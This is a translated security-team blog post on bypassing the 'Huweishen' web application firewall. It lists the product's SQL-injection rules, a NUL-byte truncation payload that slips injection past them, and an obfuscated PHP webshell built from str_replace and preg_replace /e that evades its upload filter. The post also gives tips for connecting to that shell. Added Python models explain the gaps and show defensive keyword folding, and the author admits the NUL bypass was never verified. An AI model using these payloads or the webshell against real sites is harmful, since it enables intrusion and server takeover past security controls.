Author: conqu3r Pax, Core Mac Team member
Last week I promised a proper presentation but in the end only covered one use of Burp Suite. Sorry about that. This week's topic is bypassing. Although there are only a few people here, the meeting still has to go on; sharing is what matters.
This time I am responsible for analysing the Huweishen ("guard god") protection system. Its keyword detection is genuinely thorough: you can add detection rules yourself or download rule sets from the vendor's website. The analysis follows.
1. Rule matching
The protection system matches three request sources, the GET parameters, the POST data and the cookies, against its rule lists (the matching code itself is not reproduced here). The rules applied to GET parameters are listed below, one pattern per line; `*` is a wildcard that matches any run of characters, so a rule such as `*select*from*` fires on any value containing "select" somewhere before "from":
*xp_cmdshell*
*and*db_name()*>*0*
*and*user*>*0*
*cacls.exe*:*
*exec*copy*
*insert*exec*
*bulk*insert*exec*
*select*is_srvrolemember*
*use*model*
*select*is_member*
*declare*sysname*
*xp_availablemedia*
*xp_dirtree*
*xp_terminate_process*
*sp_dropextendedproc*
*exec*sp_addlogin*
*xp_regdeletekey*
*exec*xp_regread*
*insert*temp*exec*
*exec*region*
'*exec*xp_regwrite*'
*exec*xp_regread*'
*exec*xp_regdeletevalue*'
*declare*@*char*
*exec*xp_regaddmultistring*'
*exec*xp_regdeletekey*'
*exec*xp_regenumvalues*'
*exec*xp_regread*'
*exec*xp_regremovemultistring*'
*exec*xp_regwrite*'
*declare*@*
*union*select*
*select*from*
*update*set*
The rules applied to POST data are the same list without the final `*update*set*` entry. The rules applied to cookies are identical to the GET list.
These basically cover every injection method I know of and could be called perfect.
Testing shows there are still ways around them. The key is the `%00` truncation character (a NUL byte once URL-decoded): suppose the guard god treats the parameter as a C string and stops at the `%00` when it matches rules. What happens? From its point of view nothing follows the NUL, so whatever we place after it is never tested against the rules, while the application, which is binary-safe, still receives the whole value. That disagreement about where the string ends is what breaks the rule processing.
Test (www.2cto.com):
First, against a MySQL database: select/*%00*/* from admin;
If an exclamation mark is added, as in /*! */, MySQL no longer discards the comment but keeps reading its body as part of the statement, so the NUL byte reaches the parser and that form cannot be used. The plain comment above is the one to use: with a suitable PHP version, /*%00*/ is passed through intact as part of the parameter value, MySQL drops the comment and executes select * from admin, and the guard god, which sees only select/* before the NUL, matches no rule.
Of course, my local environment had problems during testing: PHP failed to load the mysql module, so I could not verify how PHP actually handles this. But judging by how the FCKeditor upload truncation behaves, it should work.
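To make the mismatch concrete, here is an added model (not the product's code, nor the author's) of what each party sees for the same URL-encoded parameter. It assumes that the rule syntax is a plain `*` glob, that the guard god stops at the first NUL byte as a C string would, and that MySQL discards an ordinary `/* */` comment but splices the body of a `/*! */` executable comment into the statement. The rule subset and the sample parameters are constructed from the lists and the test statement above.

```python
import re
from urllib.parse import unquote_to_bytes

# Subset of the GET/POST/Cookie rules listed above. '*' is taken to match any
# run of characters (including none); the product's exact semantics are assumed.
RULES = [
    "*xp_cmdshell*",
    "*and*user*>*0*",
    "*declare*@*",
    "*union*select*",
    "*select*from*",
    "*update*set*",
]


def rule_to_regex(rule):
    # '*select*from*' -> '.*select.*from.*', case-insensitive, '.' matches newlines
    return re.compile(".*".join(re.escape(p) for p in rule.split("*")), re.I | re.S)


def matching_rules(text):
    return [r for r in RULES if rule_to_regex(r).fullmatch(text)]


def waf_view(raw_param):
    """C-string view: URL-decode, then everything after the first NUL is invisible."""
    data = unquote_to_bytes(raw_param)
    return data.split(b"\x00", 1)[0].decode("latin-1")


def app_view(raw_param):
    """PHP's binary-safe view: the full decoded value, NUL byte included."""
    return unquote_to_bytes(raw_param).decode("latin-1")


def mysql_view(sql):
    """Model of MySQL comment handling (assumption): the body of '/*! ... */' is
    spliced into the statement, while an ordinary '/* ... */' is discarded."""
    sql = re.sub(r"/\*!\d*(.*?)\*/", r"\1", sql, flags=re.S)
    return re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)


def analyse(raw_param):
    """Return (rules the guard fires on, statement MySQL would run).
    The statement is None when the NUL byte survives into the statement text,
    i.e. the parser would reject the query."""
    fired = matching_rules(waf_view(raw_param))
    stmt = mysql_view(app_view(raw_param))
    if "\x00" in stmt:
        return fired, None
    return fired, re.sub(r"\s+", " ", stmt).strip()


if __name__ == "__main__":
    for p in ["select * from admin",
              "select/**/* from admin",
              "select/*%00*/* from admin",
              "select/*!%00*/* from admin"]:
        print(repr(p), "->", analyse(p))
```

The third input is the post's test statement: the guard sees `select/*`, fires nothing, and MySQL still receives `select * from admin`. The fourth shows why the `/*!` form fails: the NUL byte is no longer inside a discarded comment.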
2. Upload rules
The guard god also has upload protection, but it turns out to key on the names of sensitive functions in the POST data. If those names never appear literally, the upload goes through and the shell runs unchanged on the back end.
A working form:
$code = 'xxx';   // the real payload arrives base64-encoded, never in clear
$x = str_replace('f', '', 'bfafsfef6f4f_ffdffeffcffoffdffef');   // stripping the padding 'f' characters leaves the string "base64_decode"
preg_replace('\'a\'eis', 'e'.'v'.'a'.'l'.'($x($code))', 'a');   // ' is used as the pattern delimiter; the /e modifier executes the replacement "eval($x($code))" as PHP
This obfuscation is enough to get past the filter: neither "eval" nor "base64_decode" occurs anywhere in the uploaded bytes. Note that it depends on the /e modifier of preg_replace, which PHP deprecated in 5.5 and removed in 7.0, so it only works on the PHP versions of that era.
If you use a one-line shell, mind how you connect to it: do not use the Chopper (菜刀) client, since its requests carry those same function names in the POST body and would trip the POST rules. Connect through a web-page client instead, or simply upload a full trojan.
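As an added illustration (not the product's code and not the author's) of why a literal keyword scan over the upload body misses this shell, and of the constant folding a defender would need to catch it, the following scans a plain one-line shell and the obfuscated form above, then folds the string concatenation, the str_replace call and the variable function name and scans again. The keyword list and both sample uploads are assumptions; the product's real keyword list is not on the page.

```python
import re

# Function names a POST-body upload filter might key on. The post says the
# product matches "key functions" but does not list them, so this set is assumed.
KEYWORDS = ["eval", "base64_decode", "assert", "system"]

# Constructed sample uploads: a plain one-line shell and the obfuscated form from the post.
PLAIN_SHELL = "<?php eval(base64_decode($_POST['code'])); ?>"
OBFUSCATED_SHELL = """<?php
$code = $_POST['code'];
$x = str_replace('f', '', 'bfafsfef6f4f_ffdffeffcffoffdffef');
preg_replace('\\'a\\'eis', 'e'.'v'.'a'.'l'.'($x($code))', 'a');
?>"""

# A single-quoted PHP string literal, allowing backslash escapes such as \' inside it.
LIT = r"'((?:[^'\\]|\\.)*)'"


def keyword_hits(body):
    """The filter as the post describes it: a literal, case-insensitive keyword scan."""
    return [k for k in KEYWORDS if re.search(r"\b" + re.escape(k) + r"\b", body, re.I)]


def fold_concat(src):
    """'e'.'v'.'a'.'l' -> 'eval': merge adjacent literal pairs until nothing changes."""
    pat = re.compile(LIT + r"\s*\.\s*" + LIT)
    while True:
        new = pat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
        if new == src:
            return src
        src = new


def fold_str_replace(src):
    """str_replace('f', '', 'bfafsf...') with literal arguments -> 'base64_decode'."""
    pat = re.compile(r"str_replace\(\s*" + LIT + r"\s*,\s*" + LIT + r"\s*,\s*" + LIT + r"\s*\)")
    return pat.sub(lambda m: "'" + m.group(3).replace(m.group(1), m.group(2)) + "'", src)


def inline_string_vars(src):
    """$x = 'base64_decode'; ... $x($code) -> base64_decode($code) (PHP variable functions)."""
    for name, value in re.findall(r"\$(\w+)\s*=\s*'([A-Za-z0-9_]+)'\s*;", src):
        src = re.sub(r"\$" + re.escape(name) + r"\(", value + "(", src)
    return src


def normalise(src):
    """Constant-fold the three tricks so the real call is visible to the keyword scan."""
    return inline_string_vars(fold_str_replace(fold_concat(src)))


if __name__ == "__main__":
    print("plain shell, raw scan:     ", keyword_hits(PLAIN_SHELL))
    print("obfuscated, raw scan:      ", keyword_hits(OBFUSCATED_SHELL))
    print("obfuscated, after folding: ", keyword_hits(normalise(OBFUSCATED_SHELL)))
```

The raw scan finds nothing in the obfuscated upload, which is exactly the gap the post exploits; after folding, `eval(base64_decode($code))` is back in the text and both keywords fire. Folding only handles constants, so a shell that builds its function name from request input at run time still gets through: a keyword filter is a speed bump, not a control.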
Where the rest of the analysis is incomplete, I will add more later. I also still need to sort out the injection bypass methods!